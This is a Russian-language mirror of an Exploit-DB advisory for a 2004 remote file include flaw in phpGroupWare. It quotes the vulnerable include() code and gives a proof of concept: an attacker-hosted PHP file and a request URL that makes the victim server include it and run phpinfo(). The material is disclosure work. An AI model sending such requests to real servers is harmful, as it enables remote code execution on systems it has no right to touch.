- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25043
- Проверка EDB
-
- Пройдено
- Автор
- CEDRIC COCHIN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2004-2573
- Дата публикации
- 2004-01-27
Код:
source: https://www.securityfocus.com/bid/12074/info
phpGroupWare is prone to a remote file include vulnerability, potentially allowing the execution of malicious PHP code. This would occur in the context of the affected web server.
The tables_update.inc.php script contains the following include calls:
/* Include older phpGroupWare update support */
include($appdir . 'tables_update_0_9_9.inc.php');
include($appdir . 'tables_update_0_9_10.inc.php');
include($appdir . 'tables_update_0_9_12.inc.php');
For example supplying the following file:
tables_update_0_9_9.inc.php = <?php print "<?php phpinfo();?>" ;?>
The following request will execute the phpinfo() command on the vulnerable target:
http://[victim]/[phpgroupware_directory]/phpgwapi/setup/tables_update.inc.php?appdir=http://[attacker]/- Источник
- www.exploit-db.com
